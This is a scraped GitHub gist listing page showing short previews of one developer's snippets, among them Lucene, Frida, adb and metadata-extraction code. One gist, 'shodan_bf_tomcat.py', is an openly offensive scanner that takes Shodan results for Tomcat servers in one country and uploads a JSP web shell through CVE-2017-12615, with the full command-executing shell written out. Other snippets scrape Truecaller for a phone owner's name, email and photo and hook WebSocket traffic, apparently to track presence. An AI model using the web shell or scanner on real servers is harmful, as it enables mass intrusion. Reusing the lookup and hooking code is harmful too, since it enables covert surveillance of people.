iddoeldor
iddoeldor
/ BlacklistLucene.java
Created
September 18, 2017 15:41
blacklist with wildcard using Lucene
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import org.apache.lucene.analysis.standard.StandardAnalyzer; | |
| import org.apache.lucene.document.Document; | |
| import org.apache.lucene.document.Field; | |
| import org.apache.lucene.document.StringField; | |
| import org.apache.lucene.index.DirectoryReader; | |
| import org.apache.lucene.index.IndexWriter; | |
| import org.apache.lucene.index.IndexWriterConfig; | |
| import org.apache.lucene.index.Term; | |
| import org.apache.lucene.search.BooleanClause; | |
| import org.apache.lucene.search.BooleanQuery; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import com.maxmind.geoip2.DatabaseReader; | |
| import com.maxmind.geoip2.exception.GeoIp2Exception; | |
| import java.io.File; | |
| import java.io.IOException; | |
| import java.net.InetAddress; | |
| import java.nio.file.Files; | |
| import java.nio.file.Paths; | |
| import static java.nio.file.StandardOpenOption.*; |
iddoeldor
/ true_caller.py
Created
November 16, 2017 06:41
extract name, email & image from true caller
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| from bs4 import BeautifulSoup | |
| api_url = 'https://xtremetricks.net/truecaller/truecall.php' | |
| phone_number = '+972500000001' | |
| res = {'number': phone_number} | |
| req = requests.post(api_url, data={'number': phone_number}) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // chromium plugin | |
| (function() { | |
| Notification.requestPermission(); | |
| WebSocket.prototype._send = WebSocket.prototype.send; | |
| WebSocket.prototype.send = function(data) { | |
| this._send(data); | |
| this.addEventListener('message', function(msg) { | |
| console.log('>> ' + msg.data); | |
| if (msg.data.includes("Presence")) { | |
| var d = eval(msg.data.split(',').slice(1).join()); |
iddoeldor
/ MaxOverlap.java
Last active
December 30, 2017 14:27
find the number of overlaps in calls
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| public static void main(String[] args) { | |
| long[] begin = new long[]{1504848555000L,1504867164000L,1504893887000L,1504893409000L,1504860962000L,1504881065000L,1504839844000L,1504890726000L}; | |
| long[] end = new long[]{1504858555000L,1504869164000L,1504897887000L,1504896409000L,1504890962000L,1504981065000L,1504849844000L,1504990726000L}; | |
| maxOverlap(begin, end); | |
| } | |
| /** | |
| * You have time-stamps (mentioned as integers), which represents phone call begin and end to call center. | |
| * find the number of overlaps in calls that suggests to add more call center agents. | |
| */ |
iddoeldor
/ shodan_bf_tomcat.py
Created
January 5, 2018 19:45
Iterating Shodan results for Tomcat servers, sending HTTP PUT requests to upload JSP shell ( CVE-2017-12615 )
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import shodan | |
| import requests | |
| SHODAN_API_KEY = "" | |
| COUNTRY = "IL" | |
| JSP_SHELL = '<%@ pageimport=”java.util.*,java.io.*”%><%%><HTML><BODY><H3>JSP SHELL</H3><FORM METHOD=”GET” NAME=”myform”ACTION=”"><INPUT TYPE=”text” NAME=”cmd”><INPUT TYPE=”submit” VALUE=”Execute”></FORM><PRE><%if (request.getParameter(“cmd”) !=null){out.println(“Command: ” +request.getParameter(“cmd”) + “<BR>”);Process p=Runtime.getRuntime().exec(request.getParameter(“cmd”));OutputStream os=p.getOutputStream();InputStream in=p.getInputStream();DataInputStream dis=new DataInputStream(in);String disr=dis.readLine();while ( disr !=null ){out.println(disr);disr=dis.readLine();}}%></PRE></BODY></HTML>' | |
| TEST_PAYLOAD = '<% out.write("<html><body>test</body></html>"); %>' | |
| URL_PREFIX = 'http://' | |
| SUFFIX_PORT = ':8080/' |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # TODO refactor to function | |
| sudo lsof -t -i:'8080' -sTCP:LISTEN # get process id that uses port 8080 | |
| ps -p $PID # get process info | |
| ps -o ppid= -p $PID # sometimes killing the PID will not work because it's a child process, this will get parent process | |
| sudo kill -9 $PID # of course. killing the process | |
| # .bashrc | |
| alias kill_port='kill -9 $(lsof -t -i:'$0' -sTCP:LISTEN)' |
iddoeldor
/ MetadataExtractor.java
Created
January 27, 2018 21:18
Iterating over html sites, extracting file's (currently only images) metadata in parallel using java8, Jsoup & Apache Tika
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import org.apache.http.HttpEntity; | |
| import org.apache.http.HttpResponse; | |
| import org.apache.http.client.HttpClient; | |
| import org.apache.http.client.methods.HttpGet; | |
| import org.apache.http.impl.client.HttpClientBuilder; | |
| import org.apache.tika.metadata.Metadata; | |
| import org.apache.tika.parser.AutoDetectParser; | |
| import org.apache.tika.parser.ParseContext; | |
| import org.apache.tika.parser.Parser; | |
| import org.apache.tika.sax.BodyContentHandler; |
iddoeldor
/ frida_server_install.sh
Last active
April 14, 2024 15:23
one liner to download, push & run the latest frida server
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| OS='android';PARCH=`adb shell getprop ro.product.cpu.abi`;\ | |
| curl -s https://api.github.com/repos/frida/frida/releases \ | |
| | jq '.[0] | .assets[] | select(.browser_download_url | match("server(.*?)'${OS}'-'${PARCH}'*\\.xz")).browser_download_url' \ | |
| | xargs wget -q --show-progress $1 \ | |
| && unxz frida-server* \ | |
| && adb root \ | |
| && adb push frida-server* /data/local/tmp/ \ | |
| && adb shell "chmod 755 /data/local/tmp/frida-server" \ | |
| && adb shell "/data/local/tmp/frida-server &" |
iddoeldor
/ adb_db_print.py
Last active
September 9, 2023 18:00
extract & print database content from android
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import os | |
| import sys | |
| import subprocess | |
| import sqlite3 | |
| import pandas as pd | |
| arg_folder = sys.argv[1] # root folder to recursively search db files from | |
| output_lines = subprocess.check_output(['adb', 'shell', ('ls -R %s' % arg_folder)]).decode('utf-8').splitlines() | |
| db_files = [] | |
| current_folder = '' |
OlderNewer